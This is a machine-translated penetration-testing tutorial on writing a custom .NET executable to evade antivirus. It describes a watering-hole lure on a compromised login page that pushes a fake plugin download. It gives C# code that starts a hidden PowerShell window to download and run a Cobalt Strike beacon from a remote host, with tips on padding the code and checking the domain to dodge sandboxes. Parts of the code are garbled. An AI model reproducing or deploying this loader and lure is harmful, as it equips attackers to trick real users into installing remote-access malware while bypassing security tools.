Hands-on teaching penetration testers to build. NET executable file

In the process of penetration testing, we sometimes want to use executables to accomplish certain tasks. Recently, we took a site during the testing process and gained the opportunity to launch a puddle attack.

Original address:HTTPS://WWW.PEEW.PW/BLOG/2017/11 ... bles-for-pentesters

Background

As a result, we embed JavaScript in the site's login page, reminding the user that the current application requires a browser plugin to be installed for normal use, and then tricking the user into downloading the appropriate plugin. Initially, we tried to use an HTA file to execute the PowerShell command on the user's system in order to establish a C2 channel to connect our server (Cobalt Strike). But for some reason, this method does not work properly on our target system. Later, we tried this attack method on our multiple systems, and everything worked, so we didn't know if the HTA was intercepted by something, or caused the user's suspicion, or the user was confused by the HTA file. But don't worry, we can get more than 50% success rate by replacing our HTA with a custom EXE file.  

However, an EXE file (also known as a portable executable, that is, PE, because it contains all the information that is required by Windows to run) is a problem in that it usually has to be written to disk, but in this way it is easily discovered by AV software. We know that the various Red team tools (from Metasploit to cobalt Strike) are able to generate an EXE file that connects the attacker's machine via the C2 channel. Although each of these files is not the same (which ensures that you have different hashes), they are difficult to escape from the AV's discernment.  

VirusTotal analysis Results of the default beacon payload for cobalt strike.

In fact, there are a number of tools that can encapsulate these PE files into different code to make them look the same, avoiding various security detections, including the veil-evasion that were previously popular. Although Veil provides attackers with a number of options, the Defense tool also knows the size of the executable wrapper.

Write custom PE file bypass security detection

It turns out that even without very sophisticated tools, advanced encryption techniques, or 0-day exploit code, you can bypass 99% of defensive products. To do this, just create something custom-something that security software has never seen before. At this point, writing a custom PE file comes in handy. we'll use Visual Studio to write a. NET executable file that will execute the commands we need.

First, let's start Visual Studio and create a new project. Here, we can use the Windows Forms App (. NET Framework) template.  

Create a new project in Visual Studio.

Because just creating a executable file that can run silently (windowless), we can delete the "Form1.cs" created by Visual Studio and the contents of the main function in Program.cs . If you want to create a more sensible front-end view of your malware, you can keep the form and create a more useful look.  

Delete the project after the form that the system generated for us.

Next, we'll show the reader how to launch a program from a C # application. Here, we will take PowerShell as an example to introduce.

(In a future article, we'll show you how to load code directly from a C # program without having to start another process)

This will use the System.Diagnostics.Process class to set up and start our new process. At the same time, the Powershell.exe is set to our process and passed to it a command to execute. In this example, we'll let PowerShell "sleep" for 10 seconds to allow enough time to see how the mechanism works.  

static void Main ()

{

Process process = new process ();

Process. Startinfo.filename = "powershell.exe";

Process. startinfo.arguments = "-c " Start-sleep-s 10"";

Process. Start ();

}

When you run the program (click the Start button in the top menu or press F5), you should see a PowerShell window stay for 10 seconds and then close. You'll notice that the initial C # process will exit itself as soon as it starts PowerShell, and it won't wait for the PowerShell process to exit.

In order to observe the behavior of the PowerShell process, the window needs to be set to a hidden state. To do this, you can use the ProcessStartInfo class directly, without having to use the "-W hidden" parameter in PowerShell, because the latter approach often leads to suspicion of security software.  

Process. Startinfo.windowstyle = Processwindowstyle.hidden;

We can also replace the previous sleep command with a PowerShell command that downloads and executes the specified payload (for example, beacon for cobalt strike). Obviously, we need to set up the corresponding payload and listener.  

Process. Startinfo.arguments = "-c "iex ((New-object net.webclient). downloadstring (& #39; http://10.7.254.230/beacon.ps1& #39; )) ""

Now, it's time to finally get to the exe file. If you have passed the final version of the code, the EXE file will be located in the project folder under ProjectnamebinDebugprojectname.exe . If you don't want to run payloads on your own system, you can choose Build> Build Solution menu item or press F6 to build a new EXE version without actually executing the program.

Let's see how it works!

The final effect

VirusTotal analysis results for our custom executable files.

Not bad!

It looks like everything is fine!

Beacon that is obtained by running our custom executable file

Next Step  

It is clear that the five elements of custom code are not a long-term solution. I have no doubt that other people will find this method very useful, and as more and more people use this method, this method will be gradually detected by AV. However, the benefit of writing our own executables is that we can customize the core of the program and make drastic changes anytime, anywhere. After all, it's easy to hide the code by adding irrelevant functions, whether it's the pi or the code that sorts the list , you can do the same.

We can also pass other. NET function to strengthen our program. For example, if we know the domain name of the target system, we can check the domain name before starting the PowerShell process to avoid getting caught in the sandbox.

Obviously, we still call PowerShell here, so any logs or alerts related to this still apply. Ideally, we will not invoke any programs other than our custom executables.

The next important step is to put all the contents of the payload into the executable file. There are many aspects involved, from hosting PowerShell code on the local machine, to completing the download and execution with commands, and loading the shell code into memory.

Guess you like: use Python cgihttpserver to bypass csrf tokens

Hands-on teaching penetration testers to build. NET executable file